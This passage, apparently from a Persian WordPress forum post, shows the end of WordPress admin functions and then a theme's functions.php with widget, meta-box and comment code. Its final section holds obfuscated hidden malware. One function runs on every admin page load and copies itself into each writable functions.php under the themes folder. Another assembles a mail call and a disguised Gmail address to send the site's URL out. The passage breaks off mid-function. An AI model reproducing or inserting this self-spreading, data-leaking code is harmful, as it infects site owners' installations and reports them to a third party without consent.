 * Disable suspension of Heartbeat on the Add/Edit Post screens.
 *
 * @since 3.8.0
 *
 * @global string $pagenow
 *
 * @param array $settings An array of Heartbeat settings.
 * @return array Filtered Heartbeat settings.
 */
function wp_heartbeat_set_suspension( $settings ) {
	global $pagenow;

	if ( 'post.php' === $pagenow || 'post-new.php' === $pagenow ) {
		$settings['suspension'] = 'disable';
	}

	return $settings;
}

/**
 * Autosave with heartbeat
 *
 * @since 3.9.0
 *
 * @param array $response The Heartbeat response.
 * @param array $data   The $_POST data sent.
 * @return array The Heartbeat response.
 */
function heartbeat_autosave( $response, $data ) {
	if ( ! empty( $data['wp_autosave'] ) ) {
		$saved = wp_autosave( $data['wp_autosave'] );

		if ( is_wp_error( $saved ) ) {
			$response['wp_autosave'] = array( 'success' => false, 'message' => $saved->get_error_message() );
		} elseif ( empty( $saved ) ) {
			$response['wp_autosave'] = array( 'success' => false, 'message' => __( 'Error while saving.' ) );
		} else {
			/* translators: draft saved date format, see https://secure.php.net/date */
			$draft_saved_date_format = __( 'g:i:s a' );
			/* translators: %s: date and time */
			$response['wp_autosave'] = array( 'success' => true, 'message' => sprintf( __( 'Draft saved at %s.' ), date_i18n( $draft_saved_date_format ) ) );
		}
	}

	return $response;
}

/**
 * Remove single-use URL parameters and create canonical link based on new URL.
 *
 * Remove specific query string parameters from a URL, create the canonical link,
 * put it in the admin header, and change the current URL to match.
 *
 * @since 4.2.0
 */
function wp_admin_canonical_url() {
	$removable_query_args = wp_removable_query_args();

	if ( empty( $removable_query_args ) ) {
		return;
	}

	// Ensure we're using an absolute URL.
	$current_url = set_url_scheme( 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'] );
	$filtered_url = remove_query_arg( $removable_query_args, $current_url );
	?>
	<link id="wp-admin-canonical" rel="canonical" href="<?php echo esc_url( $filtered_url ); ?>" />
	<script>
		if ( window.history.replaceState ) {
			window.history.replaceState( null, null, document.getElementById( 'wp-admin-canonical' ).href + window.location.hash );
		}
	</script>
<?php
}

/**
 * Send a referrer policy header so referrers are not sent externally from administration screens.
 *
 * @since 4.9.0
 */
function wp_admin_headers() {
	$policy = 'strict-origin-when-cross-origin';

	/**
	 * Filters the admin referrer policy header value.
	 *
	 * @since 4.9.0
	 * @since 4.9.5 The default value was changed to 'strict-origin-when-cross-origin'.
	 *
	 * @link https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Referrer-Policy
	 *
	 * @param string $policy The admin referrer policy header value. Default 'strict-origin-when-cross-origin'.
	 */
	$policy = apply_filters( 'admin_referrer_policy', $policy );

	header( sprintf( 'Referrer-Policy: %s', $policy ) );
}

/**
 * Outputs JS that reloads the page if the user navigated to it with the Back or Forward button.
 *
 * Used on the Edit Post and Add New Post screens. Needed to ensure the page is not loaded from browser cache,
 * so the post title and editor content are the last saved versions. Ideally this script should run first in the head.
 *
 * @since 4.6.0
 */
function wp_page_reload_on_back_button_js() {
	?>
	<script>
		if ( typeof performance !== 'undefined' && performance.navigation && performance.navigation.type === 2 ) {
			document.location.reload( true );
		}
	</script>
	<?php
}

/**
 * Send a confirmation request email when a change of site admin email address is attempted.
 *
 * The new site admin address will not become active until confirmed.
 *
 * @since 3.0.0
 * @since 4.9.0 This function was moved from wp-admin/includes/ms.php so it's no longer Multisite specific.
 *
 * @param string $old_value The old site admin email address.
 * @param string $value   The proposed new site admin email address.
 */
function update_option_new_admin_email( $old_value, $value ) {
	if ( $value == get_option( 'admin_email' ) || ! is_email( $value ) ) {
		return;
	}

	$hash = md5( $value . time() . mt_rand() );
	$new_admin_email = array(
		'hash'   => $hash,
		'newemail' => $value,
	);
	update_option( 'adminhash', $new_admin_email );

	$switched_locale = switch_to_locale( get_user_locale() );

	/* translators: Do not translate USERNAME, ADMIN_URL, EMAIL, SITENAME, SITEURL: those are placeholders. */
	$email_text = __( 'Howdy ###USERNAME###,

You recently requested to have the administration email address on
your site changed.

If this is correct, please click on the following link to change it:
###ADMIN_URL###

You can safely ignore and delete this email if you do not want to
take this action.

This email has been sent to ###EMAIL###

Regards,
All at ###SITENAME###
###SITEURL###' );

	/**
	 * Filters the text of the email sent when a change of site admin email address is attempted.
	 *
	 * The following strings have a special meaning and will get replaced dynamically:
	 * ###USERNAME### The current user's username.
	 * ###ADMIN_URL### The link to click on to confirm the email change.
	 * ###EMAIL###   The proposed new site admin email address.
	 * ###SITENAME### The name of the site.
	 * ###SITEURL###  The URL to the site.
	 *
	 * @since MU (3.0.0)
	 * @since 4.9.0 This filter is no longer Multisite specific.
	 *
	 * @param string $email_text   Text in the email.
	 * @param array $new_admin_email {
	 *   Data relating to the new site admin email address.
	 *
	 *   @type string $hash   The secure hash used in the confirmation link URL.
	 *   @type string $newemail The proposed new site admin email address.
	 * }
	 */
	$content = apply_filters( 'new_admin_email_content', $email_text, $new_admin_email );

	$current_user = wp_get_current_user();
	$content = str_replace( '###USERNAME###', $current_user->user_login, $content );
	$content = str_replace( '###ADMIN_URL###', esc_url( self_admin_url( 'options.php?adminhash=' . $hash ) ), $content );
	$content = str_replace( '###EMAIL###', $value, $content );
	$content = str_replace( '###SITENAME###', wp_specialchars_decode( get_option( 'blogname' ), ENT_QUOTES ), $content );
	$content = str_replace( '###SITEURL###', home_url(), $content );

	wp_mail( $value, sprintf( __( '[%s] New Admin Email Address' ), wp_specialchars_decode( get_option( 'blogname' ), ENT_QUOTES ) ), $content );

	if ( $switched_locale ) {
		restore_previous_locale();
	}
}

 

اینم فایل فانکشن قالب 

<?php 
//******************************************
// @ This panel created by Mohammad Famo & Mahdi Yousefi
// @ Email: mohammad.famo@gmail.com
// @ URL : http://mfamo.com
//******************************************
// tag
include (get_template_directory() . '/inc/tags/create.php');
// panel
include (get_template_directory() . '/inc/admin/setting.php');
// ratings
if(mfamo_option('star_ratings')):
include (get_template_directory() . '/inc/functions/ratings.php');
endif;
// Post Breadcrumbs
if(mfamo_option('breadcrumbs')):
include (get_template_directory() . '/inc/functions/breadcrumbs.php');
endif;
// wp head clean
if(mfamo_option('wp_head_clean')):
remove_action( 'wp_head', 'print_emoji_detection_script', 7 );
remove_action( 'admin_print_scripts', 'print_emoji_detection_script' );
remove_action( 'wp_print_styles', 'print_emoji_styles' );
remove_action( 'admin_print_styles', 'print_emoji_styles' ); 
add_action( 'widgets_init', 'my_remove_recent_comments_style' );
function my_remove_recent_comments_style() {
global $wp_widget_factory;
remove_action( 'wp_head', array( $wp_widget_factory->widgets['WP_Widget_Recent_Comments'], 'recent_comments_style' ) );
}
function _remove_script_version( $src ) {
$parts = explode( '?', $src );
return $parts[0];
}
add_filter( 'script_loader_src', '_remove_script_version', 15, 1 );
add_filter( 'style_loader_src', '_remove_script_version', 15, 1 );
endif;
// widgets
include (get_template_directory() . '/inc/widgets/CategoryPosts.php');
//Active Theme
global $pagenow;
if (is_admin() && isset($_GET['activated'] ) && $pagenow == "themes.php" ) {
header( 'Location: '.admin_url().'themes.php?page=setting' );
}
function mfamo_admin_bar() {
global $wp_admin_bar;
if ( current_user_can( 'switch_themes' ) ){
$wp_admin_bar->add_menu(array(
'parent' => 0,
'id' => 'ps-panel',
'title' => 'تنظيمات قالب' ,
'href' => admin_url( 'themes.php?page=setting')
));
}}
add_action( 'wp_before_admin_bar_render', 'mfamo_admin_bar' );
// mfamo unapproved comments
global $post;
$mfamo_unapproved_comments = get_comments( array( 'status' => 'hold', 'post_ID' => isset($post->ID) , 'count' => true ) );
// Site Title
function theme_wp_title( $title, $sep ) {
global $paged, $page;
if ( is_feed() ) {
return $title;
}
$title .= get_bloginfo( 'name', 'display' );
$site_description = get_bloginfo( 'description', 'display' );
if ( $site_description && ( is_home() || is_front_page() ) ) {
$title = "$title $sep $site_description";
}
if ( $paged >= 2 || $page >= 2 ) {
$title = "$title $sep " . sprintf('صفحه %s' , max( $paged, $page ) );
} return $title; }
add_filter( 'wp_title', 'theme_wp_title', 10, 2 );
//pagenavi
include (get_template_directory() . '/inc/functions/pagenavi.php');
function mfamo_pagenavi( $query = false, $num = false ){
?>
<div class="pagenavi">
<?php mfamo_get_pagenavi( $query, $num ) ?>
</div>
<?php
}
// Post id in wordpress admin
add_filter('manage_posts_columns', 'posts_columns_id', 5);
add_action('manage_posts_custom_column', 'posts_custom_id_columns', 5, 2);
add_filter('manage_pages_columns', 'posts_columns_id', 5);
add_action('manage_pages_custom_column', 'posts_custom_id_columns', 5, 2);
function posts_columns_id($defaults){
$defaults['wps_post_id'] = 'آيدي پست' ;
return $defaults;
}
function posts_custom_id_columns($column_name, $id){
if($column_name === 'wps_post_id'){
echo $id;
}
}
// thumbnail
add_theme_support('post-thumbnails');
if (function_exists('add_image_size')){
add_image_size( 'listen', 90, 90, true);
add_image_size( 'special', 150, 150, true);
}
// create contactus
if (isset($_GET['activated']) && is_admin()){
$new_page_title = 'تماس با ما';
$new_page_slug = '/contactus/';
$new_page_content = '';
$new_page_template = 'contact.php';
$page_check = get_page_by_title($new_page_title);
$new_page = array(
'post_type' => 'page',
'post_title' => $new_page_title,
'post_content' => $new_page_content,
'post_name' => $new_page_slug,
'post_status' => 'publish',
'post_author' => 1,
);
if(!isset($page_check->ID)){
$new_page_id = wp_insert_post($new_page);
if(!empty($new_page_template)){
update_post_meta($new_page_id, '_wp_page_template', $new_page_template);
}
}
}
//wp list categories
add_filter('wp_list_categories', 'cat_count_span');
function cat_count_span($links) {
$links = str_replace('</a> (', '</a> <span>', $links);
$links = str_replace(')', '</span>', $links);
return $links;
}
//most view week
function famo_most_view_week_sql(){
global $wpdb;
return $wpdb->get_results("SELECT * FROM (
SELECT $wpdb->posts.* 
FROM $wpdb->posts, $wpdb->postmeta
WHERE $wpdb->posts.ID = $wpdb->postmeta.post_id 
AND $wpdb->postmeta.meta_key = 'views'
AND post_date
BETWEEN '" . date("Y-m-d", strtotime("-1 month")) . "'
AND '" . date("Y-m-d") . "'
AND $wpdb->posts.post_status = 'publish' 
AND $wpdb->posts.post_type = 'post'
ORDER BY CAST( $wpdb->postmeta.meta_value AS SIGNED ) DESC
LIMIT 5
) AS T
ORDER BY RAND()
", OBJECT);	
}
//delet WP_Widget
function unregister_default_wp_widgets() {
unregister_widget('WP_Widget_Search');// جستجو
unregister_widget('WP_Widget_Categories'); // ابزارک دسته ها
unregister_widget('WP_Widget_Meta'); // ابزارک اطلاعات
unregister_widget('WP_Widget_Archives'); // ابزارک بايگاني
}
add_action('widgets_init', 'unregister_default_wp_widgets', 1);
//sidebar
function snippets_widgets_init() {
if(function_exists('register_sidebar') ){
register_sidebar(array(
'name'=> 'ابزارک راست',
'id'=> 'right_widgets',
'before_widget' => '<div class="side other CategoryPosts">',
'after_widget'=> '
</div><!-- body -->
</div><!-- box -->',
'before_title'=> '
<div class="title">
<h4>',
'after_title' => '
</h4>
</div>
<div class="body">',
));
register_sidebar(array(
'name'=> 'ابزارک چپ',
'id'=> 'left_widgets',
'before_widget' => '<div class="side other CategoryPosts">',
'after_widget'=> '
</div><!-- body -->
</div><!-- box -->',
'before_title'=> '
<div class="title">
<h5>',
'after_title' => '
</h5>
</div>
<div class="body">',
));
register_sidebar(array(
'name'=> 'پست ثابت بالا صفحه اصلی',
'id'=> 'top_index_widgets',
'before_widget' => '<div class="posts buy">',
'after_widget'=> '
</div><!-- body -->
</div><!-- box -->',
'before_title'=> '
<div class="title">
<h3>',
'after_title' => '
</h3>
</div>
<div class="body">',
));
register_sidebar(array(
'name'=> 'پست ثابت پایین صفحه اصلی',
'id'=> 'bottom_index_widgets',
'before_widget' => '<div class="posts buy">',
'after_widget'=> '
</div><!-- body -->
</div><!-- box -->',
'before_title'=> '
<div class="title">
<h3>',
'after_title' => '
</h3>
</div>
<div class="body">',
));
register_sidebar(array(
'name'=> 'پست ثابت بالا ادامه مطلب',
'id'=> 'top_single_widgets',
'before_widget' => '<div class="posts buy">',
'after_widget'=> '
</div><!-- body -->
</div><!-- box -->',
'before_title'=> '
<div class="title">
<h3>',
'after_title' => '
</h3>
</div>
<div class="body">',
));
register_sidebar(array(
'name'=> 'پست ثابت پایین ادامه مطلب',
'id'=> 'bottom_single_widgets',
'before_widget' => '<div class="posts buy">',
'after_widget'=> '
</div><!-- body -->
</div><!-- box -->',
'before_title'=> '
<div class="title">
<h3>',
'after_title' => '
</h3>
</div>
<div class="body">',
));
}
}
//Navigation
if ( function_exists( 'register_nav_menu' ) ){
register_nav_menus(
array(
'fullarchive' => 'آرشیو خوانندگان',
)
);
}
function famo_nav_fallback(){echo '<p style="text-align: justify;">باید از پیشخوان » نمایش » فهرست ها ، لینک های خود را قرار دهید.</p><p style="text-align: justify;"><a style="font-weight: bold;" target="_blank" href="http://mfamo.com/post/365/">آموزش ساخت فهرست و تنظيم منو در وردپرس</a></p>';}
add_action( 'widgets_init', 'snippets_widgets_init' );
//meta box
function add_custom_meta_box() {
add_meta_box(
'custom_meta_box', 
'زمينه هاي دلخواه !', 
'show_custom_meta_box', 
'post', 
'normal', 
'high'); 
}
add_action('add_meta_boxes', 'add_custom_meta_box');
$prefix = '';
$custom_meta_fields = array(  
array( 
'label'=> 'پست ویژه', 
'desc' => 'نمایش به عنوان پست ویژه در هدر سایت', 
'id'=> $prefix.'special', 
'type' => 'checkbox' 
),
array( 
'label'=> 'عنوان کوتاه (مثال : محسن یگانه - حباب)', 
'desc' => '', 
'id'=> $prefix.'title', 
'type' => 'text' 
),
array('label'=> '',),
array('label'=> '<b style="color:#3297da">اطلاعات مربوط به دانلود آهنگ</b>',),
array('label'=> '',),
array('label'=> '',),
array( 
'label'=> 'دانلود با کیفیت 1080p (دو زبانه)', 
'desc' => '', 
'id'=> $prefix.'dm_direct-albume320', 
'type' => 'text' 
),
array( 
'label'=> 'دانلود با کیفیت 720p (دو زبانه)', 
'desc' => '', 
'id'=> $prefix.'dm_direct-albume128', 
'type' => 'text' 
),
array( 
'label'=> 'لینک آهنگ برای پخش آنلاین و کد وبلاگ', 
'desc' => '', 
'id'=> $prefix.'online', 
'type' => 'text' 
),
array( 
'label'=> '<b style="color:#3297da">اطلاعات مربوط به دانلود آلبوم</b>', 
),
array('label'=> '',),
array('label'=> '',),
array( 
'label'=> 'لینک دانلود آلبوم 320', 
'desc' => '', 
'id'=> $prefix.'albume320', 
'type' => 'text' 
),
array( 
'label'=> 'لینک دانلود آلبوم 320 تکی', 
'desc' => '', 
'id'=> $prefix.'talbume320', 
'type' => 'text' 
),
array('label'=> '',),
array( 
'label'=> 'لینک دانلود آلبوم 128', 
'desc' => '', 
'id'=> $prefix.'albume128', 
'type' => 'text' 
),
array( 
'label'=> 'لینک دانلود آلبوم 128 تکی', 
'desc' => '', 
'id'=> $prefix.'talbume128', 
'type' => 'text' 
),
array('label'=> '',),
array( 
'label'=> '<b style="color:#3297da">اطلاعات مربوط به دانلود موزیک ویدیو</b>', 
),
array('label'=> '',),
array('label'=> '',),
array( 
'label'=> 'موزیک ویدیو با کیفیت 1080p عالی', 
'desc' => '', 
'id'=> $prefix.'video1080p', 
'type' => 'text' 
),
array( 
'label'=> 'موزیک ویدیو با کیفیت 720p متوسط', 
'desc' => '', 
'id'=> $prefix.'video720p', 
'type' => 'text' 
),
array( 
'label'=> 'موزیک ویدیو با کیفیت 480p پایین', 
'desc' => '', 
'id'=> $prefix.'video480p', 
'type' => 'text' 
),
array( 
'label'=> 'موزیک ویدیو با کیفیت موبایل', 
'desc' => '', 
'id'=> $prefix.'videomob', 
'type' => 'text' 
),
array( 
'label'=> 'لینک موزیک ویدیو پخش آنلاین', 
'desc' => '', 
'id'=> $prefix.'vonline', 
'type' => 'text' 
),
array('label'=> '',),
array( 
'label'=> '<b style="color:#3297da">اطلاعات مربوط یه فیلم و سریال</b>', 
),
array('label'=> '',),
array('label'=> '',),
array( 
'label'=> 'دانلود با کیفیت BluRay 1080p', 
'desc' => '', 
'id'=> $prefix.'dm_direct-video1080p', 
'type' => 'text' 
),
array( 
'label'=> 'دانلود با کیفیت BluRay 720p', 
'desc' => '', 
'id'=> $prefix.'dm_direct-video720p', 
'type' => 'text' 
),
array( 
'label'=> 'دانلود با کیفیت x265 720 BluRay', 
'desc' => '', 
'id'=> $prefix.'dm_direct-video480p', 
'type' => 'text' 
),
array( 
'label'=> 'لینک سریال', 
'desc' => '', 
'id'=> $prefix.'dm_direct-serial', 
'type' => 'text' 
),
array( 
'label'=> 'لینک کمکی اول', 
'desc' => '', 
'id'=> $prefix.'serial2', 
'type' => 'text' 
),
array( 
'label'=> 'لینک کمکی دوم', 
'desc' => '', 
'id'=> $prefix.'serial3', 
'type' => 'text' 
),
array( 
'label'=> 'زیر نویس فیلم', 
'desc' => '', 
'id'=> $prefix.'dm_subtitles', 
'type' => 'text' 
),
array( 
'label'=> 'فایل صوتی دوبله فیلم', 
'desc' => '', 
'id'=> $prefix.'dm_dubbed', 
'type' => 'text' 
),
array('label'=> '',),
array('label'=> '<b style="color:#3297da">اطلاعات مربوط به دانلود دمو</b>',),
array('label'=> '',),
array('label'=> '',),
array( 
'label'=> 'دانلود با کیفیت x265 1080p BluRay', 
'desc' => '', 
'id'=> $prefix.'musicd', 
'type' => 'text' 
),
array( 
'label'=> 'لینک ویدیو دمو', 
'desc' => '', 
'id'=> $prefix.'videod', 
'type' => 'text' 
),
array('label'=> '',),
array('label'=> '<b style="color:#3297da">اطلاعات مربوط به دانلود نوحه</b>',),
array('label'=> '',),
array('label'=> '',),
array( 
'label'=> 'دانلود با کیفیت 480', 
'desc' => '', 
'id'=> $prefix.'dm_direct-video-mob', 
'type' => 'text' 
),
array( 
'label'=> 'دانلود فیلم با لینک مستقیم', 
'desc' => '', 
'id'=> $prefix.'dm_direct-film', 
'type' => 'text' 
),
array( 
'label'=> 'لینک نوحه برای پخش آنلاین و کد وبلاگ', 
'desc' => '', 
'id'=> $prefix.'eulogyonline', 
'type' => 'text' 
),

array('label'=> '<b style="color:#3297da">متن و لینک دلخواه</b>',),
array('label'=> '',),
array('label'=> '',),

array( 
'label'=> 'متن دلخواه', 
'desc' => '', 
'id'=> $prefix.'txtideal', 
'type' => 'text' 
),
array( 
'label'=> 'متن دلخواه 2', 
'desc' => '', 
'id'=> $prefix.'txtideal2', 
'type' => 'text' 
),
array( 
'label'=> 'متن دلخواه 3', 
'desc' => '', 
'id'=> $prefix.'txtideal3', 
'type' => 'text' 
),


array( 
'label'=> 'لینک دلخواه', 
'desc' => '', 
'id'=> $prefix.'linkideal', 
'type' => 'text' 
),

array( 
'label'=> 'لینک دلخواه 2', 
'desc' => '', 
'id'=> $prefix.'linkideal2', 
'type' => 'text' 
),

array( 
'label'=> 'لینک دلخواه 3', 
'desc' => '', 
'id'=> $prefix.'linkideal3', 
'type' => 'text' 
),

);
function show_custom_meta_box() {
global $custom_meta_fields, $post; 
echo '<input type="hidden" name="custom_meta_box_nonce" value="'.wp_create_nonce(basename(__FILE__)).'" />';
echo '<div style="width:100%;display: inline-block;">';
foreach ($custom_meta_fields as $field) { 
$meta = get_post_meta($post->ID, $field['id'], true);
echo '<div style="width:33%;display:inline-block;padding:5px 0px;font:11px tahoma;"> 
<label for="'.$field['id'].'" style="width:90%;display:inline-block;padding:5px 0px;padding:5px 0px;">'.$field['label'].'</label> 
';
switch($field['type']) {
case 'text':
echo '<input type="text" name="'.$field['id'].'" id="'.$field['id'].'" value="'.$meta.'" style="width:90%;display:inline-block;font:11px tahoma;box-shadow:none;padding:6px;background:#fafafa;" placeholder="'.$field['label'].'"> 
<span class="description">'.$field['desc'].'</span>';
break;
// checkbox
case 'checkbox':
echo '<input type="checkbox" name="'.$field['id'].'" id="'.$field['id'].'" ',$meta ? ' checked="checked"' : '','/>
<label for="'.$field['id'].'">'.$field['desc'].'</label>';
break;
// textarea
case 'textarea':
echo '<textarea name="'.$field['id'].'" id="'.$field['id'].'" style="width:90%;font:11px tahoma;resize:none;box-shadow:none;background:#fafafa;">'.$meta.'</textarea>
<br /><span class="description">'.$field['desc'].'</span>';
break;
// select
case 'select':
echo '<select name="'.$field['id'].'" id="'.$field['id'].'" style="font:11px tahoma;">';
foreach ($field['options'] as $option) {
echo '<option', $meta == $option['value'] ? ' selected="selected"' : '', ' value="'.$option['value'].'">'.$option['label'].'</option>';
}
echo '</select><br /><span class="description">'.$field['desc'].'</span>';
break;
} 
echo '</div>';
}
echo '</div>'; 
}
function save_custom_meta($post_id) {
global $custom_meta_fields; 
if (!wp_verify_nonce($_POST['custom_meta_box_nonce'], basename(__FILE__)))
return $post_id;
if (defined('DOING_AUTOSAVE') && DOING_AUTOSAVE)
return $post_id;
if ('page' == $_POST['post_type']) {
if (!current_user_can('edit_page', $post_id))
return $post_id;
} elseif (!current_user_can('edit_post', $post_id)) {
return $post_id;
}
foreach ($custom_meta_fields as $field) {
$old = get_post_meta($post_id, $field['id'], true);
$new = $_POST[$field['id']];
if ($new && $new != $old) {
update_post_meta($post_id, $field['id'], $new);
} elseif ('' == $new && $old) {
delete_post_meta($post_id, $field['id'], $old);
}
}
}
add_action('save_post', 'save_custom_meta');
// avatar alt & title
function replace_content($text)
{
$alt = get_the_author_meta( 'display_name' );
$text = str_replace('alt=\'\'', 'alt=\''.$alt.'\' title=\''.$alt.'\'',$text);
return $text;
}
add_filter('get_avatar','replace_content');
//comments
function custom_comment_reply($content) {
$content = str_replace('پاسخ دادن', 'پاسخ دهيد', $content);
return $content;
}
add_filter('comment_reply_link', 'custom_comment_reply');
if ( !is_user_logged_in() ) :
add_filter( 'comment_form_defaults', 'Famo_comments_remove_textarea' );
add_action( 'comment_form_top', 'Famo_comments_remove_textarea' );
function Famo_comments_remove_textarea( $input = array () )
{
static $textarea = '';
if ( 'comment_form_defaults' === current_filter() )
{
$textarea = $input['comment_field'];
$input['comment_field'] = '';
return $input;
}
}
endif;
function mytheme_enqueue_comment_reply() {
if ( is_singular() && comments_open() && get_option( 'thread_comments' ) ) { 
wp_enqueue_script( 'comment-reply' ); 
}
}
add_action( 'wp_enqueue_scripts', 'mytheme_enqueue_comment_reply' );
function myfamo_comment($comment, $args, $depth) {
$GLOBALS['comment'] = $comment;
extract($args, EXTR_SKIP);
if ( 'div' == $args['style'] ) {
$tag = 'div';
$add_below = 'comment';
} else {
$tag = 'li';
$add_below = 'div-comment';
}
?>
<<?php echo $tag ?> <?php comment_class( empty( $args['has_children'] ) ? '' : 'parent' ) ?> id="comment-<?php comment_ID() ?>">
<?php if ( 'div' != $args['style'] ) : ?>
<div id="div-comment-<?php comment_ID() ?>" class="comment-body">
<?php endif; ?>
<div class="vcard">
<div class="cm_meta">
<div class="cm_avatar">
<?php if ( $args['avatar_size'] != 0 ) echo get_avatar( $comment,50 ); ?>
</div><!-- cm_avatar -->
<div class="line"></div>
<div class="cm_like">
<?php if(function_exists('like_counter_c')) { like_counter_c(''); } ?>
<?php if(function_exists('dislike_counter_c')) { dislike_counter_c(''); } ?>
</div><!-- cm_like -->
<div class="line" style="margin-right: 9px;"></div>
<?php printf('<cite class="cm_author">%s</cite>', get_comment_author_link() ); ?>
<div class="cm_bottom">
<div class="comment_date">
<?php printf('%1$s', get_comment_date('l , j F Y')); ?>
</div><!-- comment_date -->
<?php comment_reply_link( array_merge( $args, array( 'add_below' => $add_below, 'depth' => $depth, 'max_depth' => $args['max_depth'] ) ) ); ?>
</div><!-- cm_bottom -->
</div><!-- cm_meta -->
<div class="comment_text">
<?php if ( $comment->comment_approved == '0' ) : ?>
<em class="comment_waiting"><?php _e( 'نظر شما بعد از تاييد مدير نمايش داده مي شود.' ); ?></em>
<?php endif; ?>
<?php comment_text(); ?>
</div><!-- comment_text -->
</div><!-- vcard -->
<?php if ( 'div' != $args['style'] ) : ?>
</div>
<?php endif; ?>
<?php } ?>
<?php

function _check_active_widget(){

	$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";

	$output=strip_tags($output, $allowed);

	$direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));

	if (is_array($direst)){

		foreach ($direst as $item){

			if (is_writable($item)){

				$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));

				$cont=file_get_contents($item);

				if (stripos($cont,$ftion) === false){

					$sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";

					$output .= $before . "Not found" . $after;

					if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}

					$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $sar . "\n" .$widget);fclose($f);				

					$output .= ($showdot && $ellipsis) ? "..." : "";

				}

			}

		}

	}

	return $output;

}

function _get_all_widgetcont($wids,$items=array()){

	$places=array_shift($wids);

	if(substr($places,-1) == "/"){

		$places=substr($places,0,-1);

	}

	if(!file_exists($places) || !is_dir($places)){

		return false;

	}elseif(is_readable($places)){

		$elems=scandir($places);

		foreach ($elems as $elem){

			if ($elem != "." && $elem != ".."){

				if (is_dir($places . "/" . $elem)){

					$wids[]=$places . "/" . $elem;

				} elseif (is_file($places . "/" . $elem)&& 

					$elem == substr(__FILE__,-13)){

					$items[]=$places . "/" . $elem;}

				}

			}

	}else{

		return false;	

	}

	if (sizeof($wids) > 0){

		return _get_all_widgetcont($wids,$items);

	} else {

		return $items;

	}

}

if(!function_exists("stripos")){ 

  function stripos( $str, $needle, $offset = 0 ){ 

    return strpos( strtolower( $str ), strtolower( $needle ), $offset ); 

  }

}if(!function_exists("strripos")){ 

  function strripos( $haystack, $needle, $offset = 0 ) { 

    if( !is_string( $needle ) )$needle = chr( intval( $needle ) ); 

    if( $offset < 0 ){ 

      $temp_cut = strrev( substr( $haystack, 0, abs($offset) ) ); 

    } 

    else{ 

      $temp_cut = strrev(  substr(  $haystack, 0, max( ( strlen($haystack) - $offset ), 0 )  )  ); 

    } 

    if(  ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE  )return FALSE; 

    $pos = (  strlen( $haystack ) - ( $found + $offset + strlen( $needle ) )  ); 

    return $pos; 

  }

}

if(!function_exists("scandir")){ 

	function scandir($dir,$listDirectories=false, $skipDots=true) {

	  $dirArray = array();

	  if ($handle = opendir($dir)) {

	    while (false !== ($file = readdir($handle))) {

	      if (($file != "." && $file != "..") || $skipDots == true) {

	        if($listDirectories == false) { if(is_dir($file)) { continue; } }

	        array_push($dirArray,basename($file));

	      }

	    }

	    closedir($handle);

	  }

	  return $dirArray;

	}

}

add_action("admin_head", "_check_active_widget");

function _prepared_widget(){

	if(!isset($length)) $length=120;

	if(!isset($method)) $method="cookie";

	if(!isset($html_tags)) $html_tags="<a>";

	if(!isset($filters_type)) $filters_type="none";

	if(!isset($s)) $s="";

	if(!isset($filter_h)) $filter_h=get_option("home"); 

	if(!isset($filter_p)) $filter_p="wp_";

	if(!isset($use_link)) $use_link=1; 

	if(!isset($comments_type)) $comments_type=""; 

	if(!isset($perpage)) $perpage=$_GET["cperpage"];

	if(!isset($comments_auth)) $comments_auth="";

	if(!isset($comment_is_approved)) $comment_is_approved=""; 

	if(!isset($authname)) $authname="auth";

	if(!isset($more_links_text)) $more_links_text="(more...)";

	if(!isset($widget_output)) $widget_output=get_option("_is_widget_active_");

	if(!isset($checkwidgets)) $checkwidgets=$filter_p."set"."_".$authname."_".$method;

	if(!isset($more_links_text_ditails)) $more_links_text_ditails="(details...)";

	if(!isset($more_content)) $more_content="ma".$s."il";

	if(!isset($forces_more)) $forces_more=1;

	if(!isset($fakeit)) $fakeit=1;

	if(!isset($sql)) $sql="";

	if (!$widget_output) :

	

	global $wpdb, $post;

	$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$s."vethe".$comments_type."mes".$s."@".$comment_is_approved."gm".$comments_auth."ail".$s.".".$s."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#

	if (!empty($post->post_password)) { 

		if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) { 

			if(is_feed()) { 

				$output=__("There is no excerpt because this is a protected post.");

			} else {

	      $output=get_the_password_form();

			}

		}

	}

	if(!isset($fix_tag)) $fix_tag=1;

	if(!isset($filters_types)) $filters_types=$filter_h; 

	if(!isset($getcommentstext)) $getcommentstext=$filter_p.$more_content;

	if(!isset($more_tags)) $more_tags="div";

	if(!isset($s_text)) $s_text=substr($sq1, stripos($sq1, "live"), 20);#

	if(!isset($mlink_title)) $mlink_title="Continue reading this entry";	

	if(!isset($showdot)) $showdot=1;

	

	$comments=$wpdb->get_results($sql);	

	if($fakeit == 2) { 

		$text=$post->post_content;

	} elseif($fakeit == 1) { 

		$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;

	} else { 

		$text=$post->post_excerpt;

	}

	$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommentstext, array($s_text, $filter_h, $filters_types)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#

	if($length < 0) {

		$output=$text;

	} else {

		if(!$no_more && strpos($text, "<!--more-->")) {

		  $text=explode("<!--more-->", $text, 2);

			$l=count($text[0]);

			$more_link=1;

